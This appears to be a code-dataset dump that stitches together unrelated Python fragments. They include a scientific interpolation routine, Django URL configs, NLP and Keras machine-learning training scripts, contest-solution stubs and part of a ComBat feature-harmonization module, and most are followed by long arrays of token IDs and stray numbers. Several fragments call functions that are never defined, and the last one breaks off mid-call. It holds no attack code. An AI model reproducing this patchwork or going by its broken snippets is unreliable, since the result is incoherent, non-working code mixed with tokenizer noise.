sorted_dict[i].update({'Temperature (K)': f_temperature(energies)}) f_pressure = interpolate.interp1d(temperatures, pressures, kind='linear', fill_value='extrapolate') sorted_dict[i].update({'Pressure (Pa)': f_pressure(sorted_dict[i]['Temperature (K)'])}) f_soundspeed = 
interpolate.interp1d(temperatures, sound_speeds, kind='linear', fill_value='extrapolate') sorted_dict[i].update({'Sound speed (m/s)': f_soundspeed(sorted_dict[i]['Temperature (K)'])}) f_entropy = interpolate.interp1d(temperatures, entropies, kind='linear', fill_value='extrapolate') sorted_dict[i].update({'Entropy (J/kg/K)': f_entropy(sorted_dict[i]['Temperature (K)'])}) # infile_df = pd.read_csv(infile_path) # # density = sorted(list(set([reformat(i) for i in list(infile_df['Density (kg/m3)'])]))) # remove duplicates, then sort # temperature = sorted(list(set([reformat(i) for i in list(infile_df['Temperature (K)'])]))) # energy = [reformat(i) for i in list(infile_df['Energy (J/kg)'])] # pressure = [reformat(i) for i in list(infile_df['Pressure (Pa)'])] # sound_speed = [reformat(i) for i in list(infile_df['Sound speed (m/s)'])] # entropy = [reformat(i) for i in list(infile_df['Entropy (J/kg/K)'])] # # min_energy = min(energy) # max_energy = max(energy) # delta = (min_energy / max_energy)**(1 / (nu - 1)) # # new_energy = [min_energy * (delta**i) for i in range(0, nu)] # # new_temperature = [] # new_pressure = [] # new_sound_speed = [] # new_entropy = [] # # for m in range(0, nu): # # # internal energy # f_temperature = interpolate.interp1d(energy[m:], temperature[m:], kind='linear', fill_value='extrapolate') # new_temperature.append(f_temperature(new_energy)) # # # pressure # f_pressure = interpolate.interp1d(temperature[m:], pressure[m:], kind='linear', fill_value='extrapolate') # new_pressure.append(f_pressure(new_temperature[m])) # # # sound speed # f_soundspeed = interpolate.interp1d(temperature[m:], sound_speed[m:], kind='linear', fill_value='extrapolate') # new_sound_speed.append(f_soundspeed(new_temperature[m])) # # # entropy # f_entropy = interpolate.interp1d(temperature[m:], entropy[m:], kind='linear', fill_value='extrapolate') # new_entropy.append(f_entropy(new_temperature[m])) # # new_temperature = np.array(new_temperature) # new_pressure = 
np.array(new_pressure) # new_sound_speed = np.array(new_sound_speed) # new_entropy = np.array(new_entropy) # # for m in range(0, len(density), int(len(density)/6)): # # ax = [0, 0, 0, 0] # # fig = plt.figure(figsize = (10,6.128)) # # ax[0] = fig.add_subplot(221) # ax[1] = fig.add_subplot(222) # ax[2] = fig.add_subplot(223) # ax[3] = fig.add_subplot(224) # # ax[0].semilogy(np.array(temperature) * 1e-3, np.array(energy[m:]) * 1e-6, '--', label="original ANEOS") # ax[0].semilogy(new_temperature[m:] * 1e-3, np.array(new_energy[m:]) * 1e-6, '-.', label="modified") # ax[1].semilogy(np.array(temperature) * 1e-3, np.array(pressure[m:]) * 1e-6,'--', new_temperature[m:] * 1e-3, new_pressure[m:] * 1e-6,'-.') # ax[2].plot(np.array(temperature) * 1e-3, np.array(sound_speed[m:]) * 1e-3,'--', new_temperature[m:] * 1e-3, new_sound_speed[m:] * 1e-3,'-.') # ax[3].plot(np.array(temperature) * 1e-3, np.array(entropy[m:]) * 1e-3,'--', new_temperature[m:] * 1e-3, new_entropy[m:] * 1e-3,'-.') # # ax[0].legend(frameon=False) # # ax[0].set_ylabel('Energy (MJ/kg)', fontsize=10) # ax[1].set_ylabel('Pressure (MPa)', fontsize=10) # ax[2].set_ylabel('Sound Speed (km/s)', fontsize=10) # ax[3].set_ylabel('Entropy (kJ/K/kg)', fontsize=10) # ax[2].set_xlabel('Temperature ($10^3$ K)', fontsize=10) # ax[3].set_xlabel('Temperature ($10^3$ K)',fontsize=10) # # fig.suptitle("Density: %3.3f kg/m$^3$" %(density[m])) # # plt.show() # # fig.savefig("Density" + str(m) + ".png")
[ 37811, 198, 1212, 318, 257, 21015, 4226, 326, 26161, 334, 7, 81, 8873, 11, 309, 828, 350, 7, 81, 8873, 11, 309, 828, 327, 82, 7, 81, 8873, 11, 51, 828, 311, 7, 81, 8873, 11, 309, 8, 198, 1462, 309, 7, 81, 8873, 11, 334, 828,...
2.34402
2,433
from django.urls import path from . import views urlpatterns = [ path('post_posts', views.post_posts), path('fetch_posts', views.get_posts), path('fetch_post/<pk>', views.get_post), path('delete_post/<pk>', views.delete_post), path('edit_post/<pk>', views.edit_post), path('search_for_a_post', views.search_for_a_post) ]
[ 6738, 42625, 14208, 13, 6371, 82, 1330, 3108, 198, 6738, 764, 1330, 5009, 198, 198, 6371, 33279, 82, 796, 685, 198, 220, 220, 220, 3108, 10786, 7353, 62, 24875, 3256, 5009, 13, 7353, 62, 24875, 828, 198, 220, 220, 220, 3108, 10786, ...
2.402778
144
import os
[ 11748, 28686, 628, 628, 628, 628, 198 ]
2.571429
7
import numpy as np
[ 11748, 299, 32152, 355, 45941, 628 ]
3.333333
6
from django.contrib import admin from django.urls import path, include from rest_framework_jwt.views import ( obtain_jwt_token, refresh_jwt_token, ) urlpatterns = [ path('admin/', admin.site.urls), path('token-auth/', obtain_jwt_token), path('token-refresh/', refresh_jwt_token), path('employee/', include('employee.urls', namespace='employee')) ]
[ 6738, 42625, 14208, 13, 3642, 822, 1330, 13169, 198, 6738, 42625, 14208, 13, 6371, 82, 1330, 3108, 11, 2291, 198, 198, 6738, 1334, 62, 30604, 62, 73, 46569, 13, 33571, 1330, 357, 198, 220, 220, 220, 7330, 62, 73, 46569, 62, 30001, 1...
2.618056
144
#General libs import sys import os import json from datetime import datetime import time #Data wrangling libs import pandas as pd import numpy as np #DB related libs from sqlalchemy import create_engine #ML models related libs from sklearn.pipeline import Pipeline, FeatureUnion from sklearn.metrics import confusion_matrix from sklearn.model_selection import train_test_split from sklearn.multioutput import MultiOutputClassifier from sklearn.ensemble import RandomForestClassifier from sklearn.neighbors import KNeighborsClassifier from sklearn.naive_bayes import GaussianNB from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer from sklearn.metrics import classification_report from sklearn.model_selection import GridSearchCV from sklearn.linear_model import LogisticRegression #Gensim from gensim.models import KeyedVectors #Custom Transformers and Estimators import nlp_estimators #Model Saver import dill #Workspace Utils from workspace_utils import active_session #Glove Models dictionary (to be filled in when needed) glove_models_by_size = {50: None, 100: None, 300: None} #Train Configurations to be filled in when script is called train_configs = {} def get_or_load_glove_model(num_dims): ''' INPUT num_dims - int, number of dimensions of the Glove model to be loaded OUTPUT glove_model - object, the pre-trained glove model with the specified number of dimensions This function either retrieves the already-stored glove model or loads and stores it from file using the train configuration `glove_models_folderpath` ''' if glove_models_by_size[num_dims] == None: print('Pre-trained Glove Model with {} dims not found. 
'\ '\nLoading it from file...'.format(num_dims)) glove_models_by_size[num_dims] = KeyedVectors.load_word2vec_format( os.path.join(train_configs['glove_models_folderpath'], 'glove.6B.{}d_word2vec.txt'.format(num_dims)), binary=False) return glove_models_by_size[num_dims] def load_data(database_filepath): ''' INPUT database_filepath - string, filepath of database from which data will be loaded OUTPUT X - numpy array, The raw messages ready to be used to train the pipelines X_tokenized - numpy array, The tokenized messages ready to be used to train the pipelines Y - numpy array, The list of categories to which each message belongs category_columns - pandas series, The names of the categories categories_tokens - numpy array, The tokenized categories names (to be used by cats_sim feature set) This function loads and prepares data for the models training ''' engine = create_engine('sqlite:///' + database_filepath) messages_df = pd.read_sql_table(con=engine, table_name='Message') categories_df = pd.read_sql_table(con=engine, table_name='CorpusWide') messages_tokens = pd.read_sql_table(con=engine, table_name='MessageTokens') X = messages_df.message.values X_tokenized = messages_tokens.tokens_str.values Y_df = categories_df.drop(['message_id', 'message', 'original', 'genre'], axis=1) Y = Y_df.values category_columns = Y_df.columns categories_tokens = np.array([np.array(cat.split('_')) for cat in category_columns]) return X, X_tokenized, Y, category_columns, categories_tokens def build_estimator_obj(estimator_code): ''' INPUT estimator_code - string, the code of the classifier object to be built OUTPUT classifier_obj - sklearn estimator, the built classifier object This function builds a classifier object based on the estimator code received as input. 
For unexpected codes, it prints an error and exits the script execution ''' classifier_obj = None if estimator_code == 'rf': classifier_obj = RandomForestClassifier() elif estimator_code == 'lr': classifier_obj = LogisticRegression() else: print("Invalid Classifier Estimator Code " + estimator_code) exit(1) return classifier_obj def build_classifiers_build_params(classifiers_configs): ''' INPUT classifiers_configs - dict, a dictionary containing the configuration for each classifier OUTPUT classifiers_params_dict - dict, a dictionary containing the grid params to be used for each classifier in the training process This function builds a dictionary with grid params to be used in training process for each classifier whose configurations were given as input. It can handle a single classifier or a list of classifiers. ''' if len(classifiers_configs) > 1: classifiers_params_list = [] classifiers_params_dict = {} for classifier in classifiers_configs: classifier_estimator = classifier['estimator'] classifier_obj = build_estimator_obj(classifier_estimator) classifier_obj = MultiOutputClassifier(classifier_obj.set_params(**classifier['params'])) classifiers_params_list.append(classifier_obj) classifiers_params_dict['clf'] = classifiers_params_list elif len(classifiers_configs) == 1: classifier = classifiers_configs[0] classifier_estimator = classifier['estimator'] classifier_obj = build_estimator_obj(classifier_estimator) classifier_obj = MultiOutputClassifier(classifier_obj) classifiers_params_dict = {'clf' : [classifier_obj]} classifiers_params_dict.update(classifier['params']) print(classifiers_params_dict) return classifiers_params_dict def build_model(model_config,classifiers_params,categories_tokens): ''' INPUT model_config - dict, a dictionary containing the configuration for a model pipeline classifiers_configs - dict, a dictionary containing the configuration for each classifier categories_tokens - numpy array, array containing the tokenized categories names 
OUTPUT grid_search_cv - sklearn GridSearchCV, a grid search CV object containing specifications on how to train the model based on the input configs This function builds a Grid Search CV object with specifications for training process for a given model and its classifiers whose configurations were given as input. It can handle different feature_sets: - Local Word2Vec - Pre-Trained Glove - Doc2Vec - Category Similarity - All Features Sets together ''' feature_set = model_config['feature_set'] print("Building Model for feature set: {}".format(feature_set)) print("Grid Params: {}".format(model_config['grid_params'])) pipeline = grid_search_params = grid_search_cv = None jobs = -1 score = 'f1_micro' def_cv = 3 verbosity_level=10 if feature_set == 'local_w2v': pipeline = Pipeline([ ('local_w2v', nlp_estimators.TfidfEmbeddingTrainVectorizer()), ('clf', MultiOutputClassifier(GaussianNB())) ]) grid_search_params = model_config['grid_params'] elif feature_set == 'glove': pipeline = Pipeline([ ('glove', nlp_estimators.TfidfEmbeddingTrainVectorizer( get_or_load_glove_model(50))), ('clf', MultiOutputClassifier(GaussianNB())) ]) grid_search_params = {'glove__word2vec_model' : [get_or_load_glove_model(num_dims) for num_dims in model_config['grid_params']['glove__num_dims']]} elif feature_set == 'doc2vec': pipeline = Pipeline([ ('doc2vec', nlp_estimators.Doc2VecTransformer()), ('clf', MultiOutputClassifier(GaussianNB())) ]) grid_search_params = model_config['grid_params'] elif feature_set == 'cats_sim': pipeline = Pipeline([ ('cats_sim', nlp_estimators.CategoriesSimilarity( categories_tokens=categories_tokens)), ('clf', MultiOutputClassifier(GaussianNB())) ]) grid_search_params = {'cats_sim__word2vec_model' : [get_or_load_glove_model(num_dims) for num_dims in model_config['grid_params']['cats_sim__num_dims']]} elif feature_set == 'all_feats': pipeline = Pipeline([ ('features', FeatureUnion([ ('local_w2v', nlp_estimators.TfidfEmbeddingTrainVectorizer(num_dims=50)), ('glove', 
nlp_estimators.TfidfEmbeddingTrainVectorizer( get_or_load_glove_model(50) )), ('doc2vec', nlp_estimators.Doc2VecTransformer(vector_size=50)), ('cats_sim', nlp_estimators.CategoriesSimilarity(categories_tokens=categories_tokens, word2vec_model=get_or_load_glove_model(50))) ])), ('clf', MultiOutputClassifier(GaussianNB())) ]) grid_search_params = model_config['grid_params'] else: print("Error: Invalid Feature Set: " + feature_set) sys.exit(1) # Adds classifiers params to grid params grid_search_params.update(classifiers_params) grid_search_cv = GridSearchCV(estimator=pipeline, param_grid=grid_search_params, scoring=score, cv=def_cv, n_jobs=jobs, verbose=verbosity_level) return grid_search_cv def evaluate_model(model, X_test, Y_test, category_names): ''' INPUT model - sklearn GridSearchCV, the GridSearch containing the model with best performance on the training set X_test - numpy array, tokenized messages ready to be used to test the fit pipelines Y_test - numpy array, array containing the tokenized categories names for the test set category_names - pandas series, the categories names OUTPUT test_score - float, the score of the input model on the test data This function runs the model with best performance on the training set on the test dataset, printing the precision, recall and f-1 per category and returning the overall prediction score. 
''' print('Best params: %s' % model.best_params_) # Best training data accuracy print('Best training score: %.3f' % model.best_score_) # Predict on test data with best params Y_pred = model.predict(X_test) test_score = model.score(X_test, Y_test) # Test data accuracy of model with best params print('Test set score for best params: %.3f ' % test_score) for category_idx in range(len(category_names)): print(classification_report(y_pred=Y_pred[:,category_idx], y_true=Y_test[:,category_idx], labels=[0,1], target_names=[category_names[category_idx] + '-0', category_names[category_idx] + '-1'])) return test_score def save_model(model, model_filepath): ''' INPUT model - sklearn Estimator, the model with best performance on the training set model_filepath - string, path where model picke will be saved This function saves the model with best performance on the training set to a given filepath. ''' # Output a pickle file for the model with open(model_filepath,'wb') as f: dill.dump(model, f) def build_grid_search_results_df(gs_results, gs_name, test_score): ''' INPUT gs_results - dict, dictionary containing the results of GridSearchCV training gs_name - string, the name of the GridSearchCV feature set test_score - float, the score of the best performing model of the GridSearchCV on the test set OUTPUT gs_results_df - pandas DataFrame, a dataframe holding information of the GridSearchCV results (train and test) for record This function builds a dataframe with information of the GridSearchCV results (train and test) for record. 
''' gs_results_df = pd.DataFrame(gs_results) gs_results_df['grid_id'] = gs_name gs_results_df['best_model_test_score'] = test_score gs_results_df['param_set_order'] = np.arange(len(gs_results_df)) return gs_results_df def run_grid_search(): ''' This function runs the whole model selection phase: - Load Data from DB - Build Model - Run GridSearch - Save results to file - Save best model pickle file ''' start = time.time() print("Train configuration:") print(json.dumps(train_configs, indent=4)) print('Loading data...\n DATABASE: {}'.format(train_configs['database_filepath'])) X, X_tokenized, Y, category_names, categories_tokens = load_data(train_configs['database_filepath']) X_train, X_test, Y_train, Y_test = train_test_split(X_tokenized, Y, test_size=0.25) classifiers_params = build_classifiers_build_params(train_configs['classifiers']) print('Running GridSearch on models parameters...') best_score = 0.0 best_gs = '' overall_results_df = pd.DataFrame() for model_config in train_configs['models']: print('Building model...') model = build_model(model_config, classifiers_params, categories_tokens) print('Training model...') model.fit(X_train, Y_train) print('Evaluating model...') test_score = evaluate_model(model, X_test, Y_test, category_names) gs_results_df = build_grid_search_results_df(model.cv_results_, model_config['feature_set'], test_score) overall_results_df = pd.concat([overall_results_df, gs_results_df]) print('Saving model...\n MODEL: {}'.format( model_config['model_ouput_filepath'])) save_model(model.best_estimator_, model_config['model_ouput_filepath']) print('Trained model saved!') # Track best (highest test accuracy) model if test_score > best_score: best_score = test_score best_gs = model_config['feature_set'] output_filepath = train_configs['results_folderpath'] + \ 'res-' + train_configs['name'] + '-' + \ datetime.now().strftime('%Y-%m-%d_%H:%M:%S') + \ '.csv' print('Saving Results...\n FILEPATH: {}'.format(output_filepath)) 
overall_results_df.to_csv(output_filepath, index=False) print('\nClassifier with best test set accuracy: %s' % best_gs) end = time.time() print("Training Time: " + str(int(end - start)) + "s") if __name__ == '__main__': main()
[ 2, 12218, 9195, 82, 198, 11748, 25064, 198, 11748, 28686, 198, 11748, 33918, 198, 6738, 4818, 8079, 1330, 4818, 8079, 198, 11748, 640, 198, 198, 2, 6601, 1319, 27499, 9195, 82, 198, 11748, 19798, 292, 355, 279, 67, 198, 11748, 299, 32...
2.402943
6,321
import struct MAX_UINT = 2 ** (struct.calcsize('I') * 8) - 1 MAX_ULONG = 2 ** (struct.calcsize('L') * 8) - 1 UINT8_T = 1 UINT32_T = 4 UINT64_T = 8
[ 11748, 2878, 198, 198, 22921, 62, 52, 12394, 796, 362, 12429, 357, 7249, 13, 9948, 6359, 1096, 10786, 40, 11537, 1635, 807, 8, 532, 352, 198, 22921, 62, 6239, 18494, 796, 362, 12429, 357, 7249, 13, 9948, 6359, 1096, 10786, 43, 11537, ...
2.055556
72
import pytest from django.contrib.auth.models import User from django.urls import reverse from selenium.webdriver.common.by import By from .base import AuthorBaseFunctionalTest
[ 11748, 12972, 9288, 198, 6738, 42625, 14208, 13, 3642, 822, 13, 18439, 13, 27530, 1330, 11787, 198, 6738, 42625, 14208, 13, 6371, 82, 1330, 9575, 198, 6738, 384, 11925, 1505, 13, 12384, 26230, 13, 11321, 13, 1525, 1330, 2750, 198, 198, ...
3.509804
51
from .commons import VCFEntry, LabeledMat
[ 6738, 764, 9503, 684, 1330, 569, 22495, 30150, 11, 3498, 18449, 19044, 198 ]
3.230769
13
from simulation.common import Storage from simulation.common import BatteryEmptyError
[ 6738, 18640, 13, 11321, 1330, 20514, 198, 6738, 18640, 13, 11321, 1330, 23490, 40613, 12331, 628 ]
5.4375
16
#!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Wed Oct 17 21:04:48 2018 @author: Alex Alves Programa para determinar se um tumor de mama benigno (saida 0) ou maligno (saida 1) """ import pandas as pa # Importao para poder dividir os dados entre treinamento da rede e testes de validao from sklearn.model_selection import train_test_split import keras from keras.models import Sequential from keras.layers import Dense from sklearn.metrics import confusion_matrix, accuracy_score entrada = pa.read_csv('entradas-breast.csv') esperado = pa.read_csv('saidas-breast.csv') # Treinamento com 75% e validao com 25% entrada_treinar, entrada_teste, esperado_treinar,esperado_teste =train_test_split(entrada,esperado,test_size=0.25) # Criando a rede neural detectar_cancer = Sequential() #Adicionando camada de entrada detectar_cancer.add(Dense(units=16,activation='relu',kernel_initializer='random_uniform',input_dim=30)) #Adicionando uma camada oculta detectar_cancer.add(Dense(units=16,activation='relu',kernel_initializer='random_uniform')) # Adicionando camada de saida detectar_cancer.add(Dense(units=1,activation='sigmoid')) # Compilar a rede #compile(descida_gradiente,funo do erro- MSE, preciso da rede) # clipvalue -> delimita os valores dos pesos entre 0.5 e -0.5 # lr = tamanho do passo, decay-> reduo do passo otimizar = keras.optimizers.Adam(lr=0.001,decay=0.0001) # Nesse caso o clipvalue prejudicou #otimizar = keras.optimizers.Adam(lr=0.004,decay=0.0001,clipvalue=0.5) detectar_cancer.compile(otimizar,loss='binary_crossentropy',metrics=['binary_accuracy']) #detectar_cancer.compile(optimizer='adam',loss='binary_crossentropy',metrics=['binary_accuracy']) # Fazer o treinamento da rede - erro calculado para 10 amostras #depois atualiza os pesos -descida do gradiente estocasticos de 10 em 10 amostras detectar_cancer.fit(entrada_treinar,esperado_treinar,batch_size=10,epochs=100) # Pegando os pesos pesosCamadaEntrada = detectar_cancer.layers[0].get_weights() 
pesosCamadaOculta = detectar_cancer.layers[1].get_weights() pesosCamadaSaida = detectar_cancer.layers[2].get_weights() # Realizando teste de validao # retorna probabilidade de acerto validar = detectar_cancer.predict(entrada_teste) # convertendo para true ou false (1 ou 0) para comparar # se for maior que 0.5 true, caso contrrio false validar = (validar > 0.5) # compara os 2 vetores e calcula a porcentagem de acerto # da rede usando o conjunto de treinamento precisao = accuracy_score(esperado_teste,validar) # Matriz de acertos da rede acertos = confusion_matrix(esperado_teste,validar) # Outra maneira de resultado # retorna o erro e a preciso resultado = detectar_cancer.evaluate(entrada_teste, esperado_teste)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 17, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 37811, 198, 41972, 319, 3300, 2556, 1596, 2310, 25, 3023, 25, 2780, 2864, 198, 198, 31, 9800, 25, 4422, 978, 1158...
2.661808
1,029
# Solution of; # Project Euler Problem 736: Paths to Equality # https://projecteuler.net/problem=736 # # Define two functions on lattice points:$r(x,y) = (x+1,2y)$$s(x,y) = # (2x,y+1)$A path to equality of length $n$ for a pair $(a,b)$ is a sequence # $\Big((a_1,b_1),(a_2,b_2),\ldots,(a_n,b_n)\Big)$, where:$(a_1,b_1) = # (a,b)$$(a_k,b_k) = r(a_{k-1},b_{k-1})$ or $(a_k,b_k) = s(a_{k-1},b_{k-1})$ # for $k > 1$$a_k \ne b_k$ for $k < n$$a_n = b_n$$a_n = b_n$ is called the # final value. For example,$(45,90)\xrightarrow{r} # (46,180)\xrightarrow{s}(92,181)\xrightarrow{s}(184,182)\xrightarrow{s}(368,183)\xrightarrow{s}(736,184)\xrightarrow{r}$$(737,368)\xrightarrow{s}(1474,369)\xrightarrow{r}(1475,738)\xrightarrow{r}(1476,1476)$This # is a path to equality for $(45,90)$ and is of length 10 with final value # 1476. There is no path to equality of $(45,90)$ with smaller length. Find # the unique path to equality for $(45,90)$ with smallest odd length. Enter # the final value as your answer. # # by lcsm29 http://github.com/lcsm29/project-euler import timed if __name__ == '__main__': n = 1000 i = 10000 prob_id = 736 timed.caller(dummy, n, i, prob_id)
[ 2, 28186, 286, 26, 198, 2, 4935, 412, 18173, 20647, 767, 2623, 25, 10644, 82, 284, 31428, 198, 2, 3740, 1378, 16302, 68, 18173, 13, 3262, 14, 45573, 28, 49150, 198, 2, 220, 198, 2, 2896, 500, 734, 5499, 319, 47240, 501, 2173, 25, ...
2.183486
545
#!/usr/bin/env python3 # https://codingcompetitions.withgoogle.com/codejam/round/000000000019fd27/0000000000209a9e t, b = map(int, input().split()) for _ in range(t): xs = [None] * b q, k, k1, k2 = 0, 0, None, None while True: if q > 0 and q % 10 == 0: if k1 is not None and k2 is not None: v1 = query(k1+1) v2 = query(k2+1) if xs[k1] == v1 and xs[k2] == v2: pass elif xs[k1] != v1 and xs[k2] != v2: complement() elif xs[k1] != v1: xs = xs[::-1] complement() else: xs = xs[::-1] elif k1 is not None: v1 = query(k1+1) v1 = query(k1+1) if xs[k1] != v1: complement() else: v2 = query(k2+1) v2 = query(k2+1) if xs[k2] != v2: xs = xs[::-1] else: v1 = query(k+1) v2 = query(b-k) xs[k] = v1 xs[b-k-1] = v2 if v1 == v2 and k1 is None: k1 = k elif v1 != v2 and k2 is None: k2 = k k += 1 if k*2 == b: solve() break
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 3740, 1378, 66, 7656, 5589, 316, 1756, 13, 4480, 13297, 13, 785, 14, 8189, 39159, 14, 744, 14, 8269, 405, 1129, 16344, 1983, 14, 8269, 405, 22567, 64, 24, 68, 198, 83, 11, ...
1.450054
931
import requests from Stephanie.configurer import config
[ 11748, 7007, 198, 6738, 26085, 13, 11250, 15051, 1330, 4566, 628 ]
5.181818
11
#!/usr/bin/env python # Copyright 2020 Biomedical Imaging Group Rotterdam, Departments of # Medical Informatics and Radiology, Erasmus MC, Rotterdam, The Netherlands # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import subprocess import scipy.io as sio import WORC.IOparser.file_io as wio import WORC.IOparser.config_io_combat as cio import numpy as np import random import pandas as pd from WORC.addexceptions import WORCValueError, WORCKeyError import tempfile from sys import platform from WORC.featureprocessing.VarianceThreshold import selfeat_variance from sklearn.preprocessing import StandardScaler from neuroCombat import neuroCombat import matplotlib matplotlib.use('agg') import matplotlib.pyplot as plt from WORC.featureprocessing.Imputer import Imputer def ComBat(features_train_in, labels_train, config, features_train_out, features_test_in=None, labels_test=None, features_test_out=None, VarianceThreshold=True, scaler=False, logarithmic=False): """ Apply ComBat feature harmonization. Based on: https://github.com/Jfortin1/ComBatHarmonization """ # Load the config print('############################################################') print('# Initializing ComBat. 
#') print('############################################################\n') config = cio.load_config(config) excluded_features = config['ComBat']['excluded_features'] # If mod, than also load moderating labels if config['ComBat']['mod'][0] == '[]': label_names = config['ComBat']['batch'] else: label_names = config['ComBat']['batch'] + config['ComBat']['mod'] # Load the features for both training and testing, match with batch and mod parameters label_data_train, image_features_train =\ wio.load_features(features_train_in, patientinfo=labels_train, label_type=label_names) feature_labels = image_features_train[0][1] image_features_train = [i[0] for i in image_features_train] label_data_train['patient_IDs'] = list(label_data_train['patient_IDs']) # Exclude features if excluded_features: print(f'\t Excluding features containing: {excluded_features}') # Determine indices of excluded features included_feature_indices = [] excluded_feature_indices = [] for fnum, i in enumerate(feature_labels): if not any(e in i for e in excluded_features): included_feature_indices.append(fnum) else: excluded_feature_indices.append(fnum) # Actually exclude the features image_features_train_combat = [np.asarray(i)[included_feature_indices].tolist() for i in image_features_train] feature_labels_combat = np.asarray(feature_labels)[included_feature_indices].tolist() image_features_train_noncombat = [np.asarray(i)[excluded_feature_indices].tolist() for i in image_features_train] feature_labels_noncombat = np.asarray(feature_labels)[excluded_feature_indices].tolist() else: image_features_train_combat = image_features_train feature_labels_combat = feature_labels.tolist() image_features_train_noncombat = [] feature_labels_noncombat = [] # Detect NaNs, otherwise first feature imputation is required if any(np.isnan(a) for a in np.asarray(image_features_train_combat).flatten()): print('\t [WARNING] NaNs detected, applying median imputation') imputer = Imputer(missing_values=np.nan, strategy='median') 
imputer.fit(image_features_train_combat) image_features_train_combat = imputer.transform(image_features_train_combat) else: imputer = None # Apply a scaler to the features if scaler: print('\t Fitting scaler on dataset.') scaler = StandardScaler().fit(image_features_train_combat) image_features_train_combat = scaler.transform(image_features_train_combat) # Remove features with a constant value if VarianceThreshold: print(f'\t Applying variance threshold on dataset.') image_features_train_combat, feature_labels_combat, VarSel =\ selfeat_variance(image_features_train_combat, np.asarray([feature_labels_combat])) feature_labels_combat = feature_labels_combat[0].tolist() if features_test_in: label_data_test, image_features_test =\ wio.load_features(features_test_in, patientinfo=labels_test, label_type=label_names) image_features_test = [i[0] for i in image_features_test] label_data_test['patient_IDs'] = list(label_data_test['patient_IDs']) if excluded_features: image_features_test_combat = [np.asarray(i)[included_feature_indices].tolist() for i in image_features_test] image_features_test_noncombat = [np.asarray(i)[excluded_feature_indices].tolist() for i in image_features_test] else: image_features_test_combat = image_features_test image_features_test_noncombat = [] # Apply imputation if required if imputer is not None: image_features_test_combat = imputer.transform(image_features_test_combat) # Apply a scaler to the features if scaler: image_features_test_combat = scaler.transform(image_features_test_combat) # Remove features with a constant value if VarianceThreshold: image_features_test_combat = VarSel.transform(image_features_test_combat) all_features = image_features_train_combat.tolist() + image_features_test_combat.tolist() all_labels = list() for i in range(label_data_train['label'].shape[0]): all_labels.append(label_data_train['label'][i, :, 0].tolist() + label_data_test['label'][i, :, 0].tolist()) all_labels = np.asarray(all_labels) else: all_features = 
image_features_train_combat.tolist() all_labels = label_data_train['label'] # Convert data to a single array all_features_matrix = np.asarray(all_features) all_labels = np.squeeze(all_labels) # Apply logarithm if required if logarithmic: print('\t Taking log10 of features before applying ComBat.') all_features_matrix = np.log10(all_features_matrix) # Convert all_labels to dictionary if len(all_labels.shape) == 1: # No mod variables all_labels = {label_data_train['label_name'][0]: all_labels} else: all_labels = {k: v for k, v in zip(label_data_train['label_name'], all_labels)} # Split labels in batch and moderation labels bat = config['ComBat']['batch'] mod = config['ComBat']['mod'] print(f'\t Using batch variable {bat}, mod variables {mod}.') batch = [all_labels[l] for l in all_labels.keys() if l in config['ComBat']['batch']] batch = batch[0] if config['ComBat']['mod'][0] == '[]': mod = None else: mod = [all_labels[l] for l in all_labels.keys() if l in config['ComBat']['mod']] # Set parameters for output files parameters = {'batch': config['ComBat']['batch'], 'mod': config['ComBat']['mod'], 'par': config['ComBat']['par']} name = 'Image features: ComBat corrected' panda_labels = ['parameters', 'patient', 'feature_values', 'feature_labels'] feature_labels = feature_labels_combat + feature_labels_noncombat # Convert all inputs to arrays with right shape all_features_matrix = np.transpose(all_features_matrix) if mod is not None: mod = np.transpose(np.asarray(mod)) # Patients identified with batch -1.0 should be skipped skipname = 'Image features: ComBat skipped' ntrain = len(image_features_train_combat) ndel = 0 print(features_test_out) for bnum, b in enumerate(batch): bnum -= ndel if b == -1.0: if bnum < ntrain - ndel: # Training patient print('train') pid = label_data_train['patient_IDs'][bnum] out = features_train_out[bnum] # Combine ComBat and non-ComBat features feature_values_temp = list(all_features_matrix[:, bnum]) + list(image_features_train_noncombat[bnum]) # 
Delete patient for later processing del label_data_train['patient_IDs'][bnum] del image_features_train_noncombat[bnum] del features_train_out[bnum] image_features_train_combat = np.delete(image_features_train_combat, bnum, 0) else: # Test patient print('test') pid = label_data_test['patient_IDs'][bnum - ntrain] out = features_test_out[bnum - ntrain] # Combine ComBat and non-ComBat features feature_values_temp = list(all_features_matrix[:, bnum]) + list(image_features_test_noncombat[bnum - ntrain]) # Delete patient for later processing del label_data_test['patient_IDs'][bnum - ntrain] del image_features_test_noncombat[bnum - ntrain] del features_test_out[bnum - ntrain] image_features_test_combat = np.delete(image_features_test_combat, bnum - ntrain, 0) # Delete some other variables for later processing all_features_matrix = np.delete(all_features_matrix, bnum, 1) if mod is not None: mod = np.delete(mod, bnum, 0) batch = np.delete(batch, bnum, 0) # Notify user print(f'[WARNING] Skipping patient {pid} as batch variable is -1.0.') # Sort based on feature label feature_labels_temp, feature_values_temp =\ zip(*sorted(zip(feature_labels, feature_values_temp))) # Convert to pandas Series and save as hdf5 panda_data = pd.Series([parameters, pid, feature_values_temp, feature_labels_temp], index=panda_labels, name=skipname ) print(f'\t Saving image features to: {out}.') panda_data.to_hdf(out, 'image_features') ndel += 1 print(features_test_out) # Run ComBat in Matlab if config['ComBat']['language'] == 'matlab': print('\t Executing ComBat through Matlab') data_harmonized = ComBatMatlab(dat=all_features_matrix, batch=batch, command=config['ComBat']['matlab'], mod=mod, par=config['ComBat']['par'], per_feature=config['ComBat']['per_feature']) elif config['ComBat']['language'] == 'python': print('\t Executing ComBat through neuroComBat in Python') data_harmonized = ComBatPython(dat=all_features_matrix, batch=batch, mod=mod, eb=config['ComBat']['eb'], par=config['ComBat']['par'], 
